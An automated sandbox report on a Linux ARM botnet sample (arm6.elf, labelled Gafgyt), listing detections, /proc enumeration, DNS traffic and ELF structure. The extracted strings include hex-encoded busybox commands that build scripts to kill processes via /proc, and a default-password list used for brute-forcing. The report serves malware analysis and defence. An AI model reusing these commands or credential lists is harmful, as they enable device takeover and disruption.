Edit tour

Linux Analysis Report
arm6.elf

Overview

General Information

Sample name:arm6.elf
Analysis ID:1654498
MD5:bc88feeea1f6c44afbc38de1c724ad2b
SHA1:3f3af6aa2386bad9a0c8710c984fc6259095ae82
SHA256:3e858e55adcfa66c0c46eade15e62cd53010bd8790de2cd88cdf2367598737c2
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654498
Start date and time:2025-04-02 11:47:26 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 35s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm6.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/arm6.elf
PID:5413
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • arm6.elf (PID: 5413, Parent: 5335, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.elf
    • arm6.elf New Fork (PID: 5415, Parent: 5413)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm6.elfVirustotal: Detection: 42%Perma Link
Source: arm6.elfReversingLabs: Detection: 41%
Source: /tmp/arm6.elf (PID: 5415)Socket: 127.0.0.1:22448Jump to behavior
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/4@2/0
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/238/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/239/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/914/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/917/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5397/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5397/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5397/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5397/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5398/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5398/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5398/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5398/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3771/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3771/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3771/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3095/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/241/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/242/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/244/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/245/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1588/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/800/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1906/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/802/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/803/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5413)Queries kernel information via 'uname': Jump to behavior
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: /tmp/qemu-open.KzIBIw
Source: arm6.elf, 5415.1.00007f122803a000.00007f1228041000.rw-.sdmpBinary or memory string: vmware
Source: arm6.elf, 5413.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmp, arm6.elf, 5415.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: arm6.elf, 5413.1.00007f122803a000.00007f1228041000.rw-.sdmp, arm6.elf, 5415.1.00007f122803a000.00007f1228041000.rw-.sdmpBinary or memory string: qemu-arm
Source: arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5413.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmp, arm6.elf, 5415.1.000055b2df8c8000.000055b2dfa17000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmp, arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmp, arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf
Source: arm6.elf, 5413.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.KzIBIw:u}
Source: arm6.elf, 5415.1.00007ffe8ae03000.00007ffe8ae24000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5413.1.00007f122803a000.00007f1228041000.rw-.sdmp, arm6.elf, 5415.1.00007f122803a000.00007f1228041000.rw-.sdmpBinary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
Application Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654498 Sample: arm6.elf Startdate: 02/04/2025 Architecture: LINUX Score: 48 11 daisy.ubuntu.com 2->11 13 Multi AV Scanner detection for submitted file 2->13 7 arm6.elf 2->7         started        signatures3 process4 process5 9 arm6.elf 7->9         started       
SourceDetectionScannerLabelLink
arm6.elf42%VirustotalBrowse
arm6.elf42%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    No contacted IP infos
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    daisy.ubuntu.comarm5.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.24
    efea6.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.25
    xd.powerpc-440fp.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.m68k.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.ppc.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.i686.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arm6.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arc.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    mpsl.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.24
    sh4.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.24
    No context
    No context
    No context
    Process:/tmp/arm6.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:Tgj03:Tgw3
    MD5:3F57B2990E079DDED19A289B2C2D9845
    SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
    SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
    SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm6.elf.
    Process:/tmp/arm6.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):355
    Entropy (8bit):3.8407297606496944
    Encrypted:false
    SSDEEP:6:M6gceFXNH/VU8VbsceFXNNNVFT/V/3VVyAb/rVmsVot/VOArB/VH:39eGEbZejvVVIAbyl
    MD5:0772518832BB9A604910FCF92DD8E1C3
    SHA1:AF9863566C65B1043EF496C81973E51C0D4E082C
    SHA-256:15F78D0A578CA27C40C789DACEE4907132DAC4A308E9DC188D2858D5D00869B3
    SHA-512:BF3D79AC8F57EB566F074B1C4A04CACE54920BF195919DD2C0FE931E0881DB90EFEE05FD21EA127F29A9918161357F94E2D5BC8DD7179487D1B1BBCB22C50A71
    Malicious:false
    Reputation:low
    Preview:8000-22000 r-xp 00000000 fd:00 531567 /tmp/arm6.elf.2a000-2b000 rw-p 0001a000 fd:00 531567 /tmp/arm6.elf.2b000-32000 rw-p 00000000 00:00 0 .ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
    Process:/tmp/arm6.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:Tgj03:Tgw3
    MD5:3F57B2990E079DDED19A289B2C2D9845
    SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
    SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
    SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm6.elf.
    Process:/tmp/arm6.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:Tgj03:Tgw3
    MD5:3F57B2990E079DDED19A289B2C2D9845
    SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
    SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
    SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm6.elf.
    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):6.149673700278677
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:arm6.elf
    File size:107'324 bytes
    MD5:bc88feeea1f6c44afbc38de1c724ad2b
    SHA1:3f3af6aa2386bad9a0c8710c984fc6259095ae82
    SHA256:3e858e55adcfa66c0c46eade15e62cd53010bd8790de2cd88cdf2367598737c2
    SHA512:d28f65fe643e06950b2930d81f3fb6c03bfdac56cfcbf38a35ca009b947a6a08864af20bce32b9f382ef747cab70bdea7c68539fa612203fc1a7ab7a99ca9f1b
    SSDEEP:3072:lwyIxMYZtAjVXtzULUYnN8tZdSzcrrFmulElrrhCadM:lwyIxMYZtY9HYKo+Fm0ElPh2
    TLSH:A3A30999B8919B66C5D406BFFE1F528D33231BF8E2DB3207DD18AB2077CA51A092F541
    File Content Preview:.ELF..............(.....l...4...4.......4. ...(.........T...T...T.......................................................................XH...........................................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:ARM
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x816c
    Flags:0x4000002
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:4
    Section Header Offset:106804
    Section Header Size:40
    Number of Section Headers:13
    Header String Table Index:12
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .initPROGBITS0x80b40xb40x140x00x6AX001
    .textPROGBITS0x80c80xc80x16fdc0x00x6AX004
    .finiPROGBITS0x1f0a40x170a40x140x00x6AX001
    .rodataPROGBITS0x1f0b80x170b80x289c0x00x2A004
    .ARM.exidxARM_EXIDX0x219540x199540xc80x00x82AL204
    .eh_framePROGBITS0x2a0000x1a0000x40x00x3WA004
    .init_arrayINIT_ARRAY0x2a0040x1a0040x40x00x3WA004
    .fini_arrayFINI_ARRAY0x2a0080x1a0080x40x00x3WA004
    .gotPROGBITS0x2a0100x1a0100x280x40x3WA004
    .dataPROGBITS0x2a0380x1a0380x980x00x3WA004
    .bssNOBITS0x2a0d00x1a0d00x47880x00x3WA008
    .shstrtabSTRTAB0x00x1a0d00x620x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    DYNAMIC0x199540x219540x219540xc80xc84.32970x4R 0x4.ARM.exidx
    LOAD0x00x80000x80000x19a1c0x19a1c6.21050x5R E0x8000.init .text .fini .rodata .ARM.exidx
    LOAD0x1a0000x2a0000x2a0000xd00x48583.58360x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
    DYNAMIC0x00x00x00x00x00.00000x7RWE0x4

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Apr 2, 2025 11:48:17.200884104 CEST4315553192.168.2.138.8.8.8
    Apr 2, 2025 11:48:17.200949907 CEST5106253192.168.2.138.8.8.8
    Apr 2, 2025 11:48:17.295233965 CEST53431558.8.8.8192.168.2.13
    Apr 2, 2025 11:48:17.295275927 CEST53510628.8.8.8192.168.2.13
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Apr 2, 2025 11:48:17.200884104 CEST192.168.2.138.8.8.80x7240Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
    Apr 2, 2025 11:48:17.200949907 CEST192.168.2.138.8.8.80x454dStandard query (0)daisy.ubuntu.com28IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Apr 2, 2025 11:48:17.295233965 CEST8.8.8.8192.168.2.130x7240No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
    Apr 2, 2025 11:48:17.295233965 CEST8.8.8.8192.168.2.130x7240No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

    System Behavior

    Start time (UTC):09:48:14
    Start date (UTC):02/04/2025
    Path:/tmp/arm6.elf
    Arguments:-
    File size:4956856 bytes
    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1